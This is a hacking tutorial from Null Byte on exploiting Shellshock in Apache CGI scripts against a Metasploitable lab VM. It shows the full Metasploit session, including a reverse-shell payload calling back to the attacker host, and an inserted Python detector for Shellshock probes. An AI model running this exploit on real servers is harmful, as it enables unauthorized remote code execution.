
How to Exploit Shellshock on a Metasploit Web Server «Null Byte :: WonderHowTo



One of the most critical bugs of the past five years has been Shellshock, a vulnerability that allows attackers to remotely execute arbitrary code through the Unix Bash shell. The bug has been around for some time, but with the ubiquity of Unix machines connected to the web, Shellshock still poses a very real threat.

How the Shellshock Vulnerability Works

Shellshock was first disclosed in September 2014. Attacks were reported within hours of the initial disclosure, and within days there were millions of attacks and probes from botnets.

Bash is a shell, or command interpreter, that executes commands on a system, usually through a text window. It is the default shell on most Unix systems and is therefore found on Linux, macOS and other Unix variants. That is why Shellshock is so severe: more than half of the web servers on the Internet run Unix, not to mention a variety of IoT devices and even some routers.

Essentially, Shellshock works by appending commands to a function definition stored in the value of an environment variable. This is a form of code injection: because Bash keeps parsing the value past the end of the function definition, the trailing commands are executed when the variable is imported, so pretty much any code can be run.

Shellshock is actually a whole family of vulnerabilities with multiple exploitation vectors. In this guide we will use the CGI script vector, specifically the mod_cgi module that is part of the Apache HTTP server.

How Apache and CGI Play in It

Apache is a cross-platform, open-source web server developed by the Apache Software Foundation. It is feature-rich, with virtual hosting, authentication schemes, SSL/TLS, custom error messages and multi-language support. Apache also has a module called mod_cgi that handles the execution of CGI (Common Gateway Interface) scripts.

CGI is a protocol that lets web servers run console-like programs directly on the server. These programs, called CGI scripts, often handle data for dynamic web pages and interact with HTTP. A dedicated directory, usually called cgi-bin or something similar, must be set up to hold CGI scripts. When a browser requests the URL of a file in the CGI directory, the server executes the script and its output is returned to the browser.

When a CGI script is run, certain information from the request (such as HTTP headers) is copied into environment variables. That information is then passed to Bash when the script is invoked, which is what lets an attacker inject code. Fortunately for us, the Rapid7 team has developed a Metasploit module that makes exploiting this vulnerability very easy.
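As an added defensive example (not part of the original article), here is a small Python detector that applies the mechanism just described: mod_cgi copies request headers into environment variables, so a Shellshock probe has to carry a Bash function definition, `() {`, somewhere in a header value. The functions scan_request and scan_access_log, the COMBINED_LOG regex and the sample request and log lines are constructed for this example; the log parser assumes Apache's combined log format.

```python
import re

# Unpatched Bash (CVE-2014-6271/6278) treats any imported variable whose value
# starts with "() {" as a function definition and runs whatever follows the body,
# so every Shellshock probe carries this prefix (the inner space is optional).
FUNC_DEF = re.compile(r"\(\)\s*\{")

# Apache combined log: ip ident user [time] "request" status bytes "referer" "ua"
COMBINED_LOG = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" '
                          r'\d{3} \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

def scan_request(raw: str) -> dict:
    """Map header name -> value for every header of a raw HTTP request carrying a
    function definition. mod_cgi exports all headers (HTTP_USER_AGENT, HTTP_COOKIE,
    HTTP_REFERER, ...), so User-Agent is only one of many possible carriers."""
    hits = {}
    for line in raw.split("\r\n")[1:]:
        if not line:  # blank line terminates the header block
            break
        name, _, value = line.partition(":")
        if FUNC_DEF.search(value):
            hits[name.strip()] = value.strip()
    return hits

def scan_access_log(lines: list) -> list:
    """Flag combined-format log lines whose Referer or User-Agent holds a function
    definition. Only those two headers are logged, so logs alone miss probes sent
    in Cookie or other headers; inspect live requests for full coverage."""
    findings = []
    for line in lines:
        m = COMBINED_LOG.match(line)
        if not m:
            continue
        for field in ("ref", "ua"):
            if FUNC_DEF.search(m.group(field)):
                findings.append({"ip": m.group("ip"), "request": m.group("req"),
                                 "field": field})
    return findings

# Constructed sample data: a probe hidden in a Cookie header, a logged probe in a
# User-Agent, and a benign request. "echo probe" stands in for a real payload.
SAMPLE_REQUEST = ("GET /cgi-bin/hello.sh HTTP/1.1\r\nHost: 172.16.1.102\r\n"
                  "User-Agent: Mozilla/5.0\r\nCookie: () { :;}; echo probe\r\n\r\n")
SAMPLE_LOG = [
    '172.16.1.100 - - [16/Jul/2018:13:55:15 -0500] "GET /cgi-bin/hello.sh HTTP/1.1"'
    ' 200 13 "-" "() { :;}; echo probe"',
    '172.16.1.50 - - [16/Jul/2018:13:56:01 -0500] "GET /cgi-bin/hello.sh HTTP/1.1"'
    ' 200 13 "-" "Mozilla/5.0"',
]
```

The same prefix check is what the Metasploit scanner module and most IDS signatures for Shellshock key on; a hit in a request aimed at a cgi-bin path is a strong indicator, and a patched Bash simply ignores the trailing commands.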

What you need for this walkthrough

Metasploitable 2 is an excellent virtual machine full of security holes for practicing your hacking skills. I'll be attacking it from an isolated network with trusty Kali Linux. You may want to do the same to make sure you get the same results the first time you try this; then you can move on to pentesting real machines.

Step 1: Configure Target

For this exploit to work, an executable script must exist in the /cgi-bin directory. A simple "hello world!" Bash script will do for demonstration purposes. On the target machine, navigate to /usr/lib/cgi-bin and enter the following command:

  sudo nano hello.sh 

Enter your password and make the file look like this:

  #!/bin/bash
# CGI output must start with a header line followed by a blank line
echo "Content-Type: text/html"
echo ""
echo "Hello world!"

Press Ctrl-X, then Y, then Enter to save. To make the file executable, use the chmod command:

  sudo chmod 755 hello.sh 

We can verify that it works by browsing to the file on the web server.

Step 2: Prepare Exploit

Start Metasploit on the Kali machine by typing msfconsole in the terminal. We are greeted with a random banner and the Metasploit prompt:

  root@kali:~# msfconsole

____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]

         = [ metasploit v4.17.3-dev-                         ]
+ - - = [ 1795 exploits - 1019 auxiliary - 310 post       ]
+ - - = [ 538 payloads - 41 encoders - 10 nops            ]
+ - - = [ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf> 

With the search command we can easily look for exploits. Type search shellshock, locate the module apache_mod_cgi_bash_env_exec, and copy its path:

  msf > search shellshock
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                               Disclosure Date  Rank       Description
   ----                                               ---------------  ----       -----------
   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  IPFire Bash Environment Variable Injection (Shellshock)
   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Legend Perl IRC Bot Remote Code Execution
   exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Xdh / LinuxNet Perlbot / fbot IRC Bot Remote Code Execution
   exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  Dhclient Bash Environment Variable Injection (Shellshock)
   exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     Qmail SMTP Bash Environment Variable Injection (Shellshock)

msf >

Load the exploit by typing use followed by the path we copied earlier. You should now see a longer prompt indicating the currently loaded module.

  msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >

Enter options to see the various settings for this module:

  msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                            yes       The target address
   RPATH           /bin             no        Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI                        yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >

We can leave most of the defaults, but we need to set the remote host to the target's IP address and the target URI to the path of the file we placed in the /cgi-bin directory:

  msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost 172.16.1.102
rhost => 172.16.1.102
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/hello.sh
targeturi => /cgi-bin/hello.sh
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >

Next we have to select a payload. Enter show payloads to display the compatible payloads and information about each of them:

  msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > show payloads

Compatible Payloads
===================

   Name                                       Disclosure Date  Rank    Description
   ----                                       ---------------  ----    -----------
   generic/custom                                              normal  Custom Payload
   generic/debug_trap                                          normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                      normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                   normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                          normal  Generic x86 Tight Loop
   linux/x86/chmod                                             normal  Linux Chmod
   linux/x86/exec                                              normal  Linux Execute Command
   linux/x86/meterpreter/bind_ipv6_tcp                         normal  Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   linux/x86/meterpreter/bind_ipv6_tcp_uuid                    normal  Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   linux/x86/meterpreter/bind_nonx_tcp                         normal  Linux Mettle x86, Bind TCP Stager
   linux/x86/meterpreter/bind_tcp                              normal  Linux Mettle x86, Bind TCP Stager (Linux x86)
   linux/x86/meterpreter/bind_tcp_uuid                         normal  Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   linux/x86/meterpreter/reverse_ipv6_tcp                      normal  Linux Mettle x86, Reverse TCP Stager (IPv6)
   linux/x86/meterpreter/reverse_nonx_tcp                      normal  Linux Mettle x86, Reverse TCP Stager
   linux/x86/meterpreter/reverse_tcp                           normal  Linux Mettle x86, Reverse TCP Stager
   linux/x86/meterpreter/reverse_tcp_uuid                      normal  Linux Mettle x86, Reverse TCP Stager
   linux/x86/metsvc_bind_tcp                                   normal  Linux Meterpreter Service, Bind TCP
   linux/x86/metsvc_reverse_tcp                                normal  Linux Meterpreter Service, Reverse TCP Inline
   linux/x86/read_file                                         normal  Linux Read File
   linux/x86/shell/bind_ipv6_tcp                               normal  Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   linux/x86/shell/bind_ipv6_tcp_uuid                          normal  Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   linux/x86/shell/bind_nonx_tcp                               normal  Linux Command Shell, Bind TCP Stager
   linux/x86/shell/bind_tcp                                    normal  Linux Command Shell, Bind TCP Stager (Linux x86)
   linux/x86/shell/bind_tcp_uuid                               normal  Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   linux/x86/shell/reverse_ipv6_tcp                            normal  Linux Command Shell, Reverse TCP Stager (IPv6)
   linux/x86/shell/reverse_nonx_tcp                            normal  Linux Command Shell, Reverse TCP Stager
   linux/x86/shell/reverse_tcp                                 normal  Linux Command Shell, Reverse TCP Stager
   linux/x86/shell/reverse_tcp_uuid                            normal  Linux Command Shell, Reverse TCP Stager
   linux/x86/shell_bind_ipv6_tcp                               normal  Linux Command Shell, Bind TCP Inline (IPv6)
   linux/x86/shell_bind_tcp                                    normal  Linux Command Shell, Bind TCP Inline
   linux/x86/shell_bind_tcp_random_port                        normal  Linux Command Shell, Bind TCP Random Port Inline
   linux/x86/shell_reverse_tcp                                 normal  Linux Command Shell, Reverse TCP Inline
   linux/x86/shell_reverse_tcp_ipv6                            normal  Linux Command Shell, Reverse TCP Inline (IPv6)

msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >

We'll use a reverse TCP shell, so type set payload linux/x86/shell/reverse_tcp to enable it.

  msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp

Type options again and we can see the current settings for this module, now including the payload:

  msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting    Required  Description
   ----            ---------------    --------  -----------
   CMD_MAX_LENGTH  2048               yes       CMD max line length
   CVE             CVE-2014-6271      yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent         yes       HTTP header to use
   METHOD          GET                yes       HTTP method to use
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.1.102       yes       The target address
   RPATH           /bin               no        Target PATH for binaries used by the CmdStager
   RPORT           80                 yes       The target port (TCP)
   SRVHOST         0.0.0.0            yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080               yes       The local port to listen on.
   SSL             false              no        Negotiate SSL/TLS for outgoing connections
   SSLCert                            no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /cgi-bin/hello.sh  yes       Path to CGI script
   TIMEOUT         5                  yes       HTTP read response timeout (seconds)
   URIPATH                            no        The URI to use for this exploit (default is random)
   VHOST                              no        HTTP server virtual host


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.100     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >

Step 3: Get Shell

Some Metasploit modules have a handy little function that checks whether the target is vulnerable. Enter check, and if the module supports it, it will report whether or not the target is vulnerable.

  msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > check
[*] 172.16.1.102:80 The target is vulnerable.
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >

We can see that the target is indeed vulnerable, so use the exploit command to launch the attack. A shell session opens, and we can now run commands such as id and whoami to display information about the current user:

  msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 172.16.1.100:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (36 bytes) to 172.16.1.102
[*] Command shell session 2 opened (172.16.1.100:4444 -> 172.16.1.102:49499) at 2018-07-16 13:55:15 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data

How to Protect Yourself from Shellshock Vulnerabilities

The answer is simple: patch your system. If your system still isn't patched, you have no one to blame but yourself. This vulnerability has been around for years and patches are available for almost every system.

Stay Tuned for Privilege Escalation

So far, we've learned about Shellshock and the CGI attack vector, used a Metasploit module to exploit the vulnerability, and obtained a shell on our target. But since this is a limited shell, we can only do so much. In the next article, we'll use a kernel exploit to escalate privileges and get root.

Cover image by Tumisu/Pixabay; screenshots by drd_/Null Byte
